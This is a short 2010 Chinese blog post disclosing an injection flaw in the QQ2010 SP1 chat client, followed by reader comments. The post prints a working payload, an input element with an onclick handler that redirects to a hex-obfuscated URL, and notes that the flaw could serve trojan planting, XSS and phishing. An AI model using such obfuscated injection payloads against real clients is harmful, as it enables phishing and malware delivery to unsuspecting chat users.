QQ2010 sp1出现漏洞

早上一觉醒来,英雄问我安装了QQ2010SP1没,当他问我,我就知道有什么事了,肯定有漏洞.果然,下来发现代码未过滤完善,在2010SP1聊天记录中输入一下代码:
[code]<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />[/code] 在聊天记录中,我们找寻不到以上代码
而出现如图显示

利用此漏洞可以挂马 XSS 钓鱼等邪恶的事情.

评论 (7)
  1. 沙发
    Fanr 2010-07-29 09:03

    试试去~~~

  2. 板凳
    Fanr 2010-07-29 09:04

    活过来了,哈哈~

  3. 地板
    Fantasy 2010-08-02 02:46

    那天看新闻说半个小时就修复了……

  4. 4 楼
    减肥药哪种好 2010-08-02 15:01

    腾讯也犯错了

  5. 5 楼
    济南网站制作 2010-08-02 15:18

    博主写的不错呵呵~~以后多交流。互相顶顶~呵呵

  6. 6 楼
    阿七 2010-08-02 15:33

    我更新到SP2测试了。

  7. 7 楼
    济南网页制作 2010-08-02 16:02

    博主加油~喜欢看你的博客呵呵。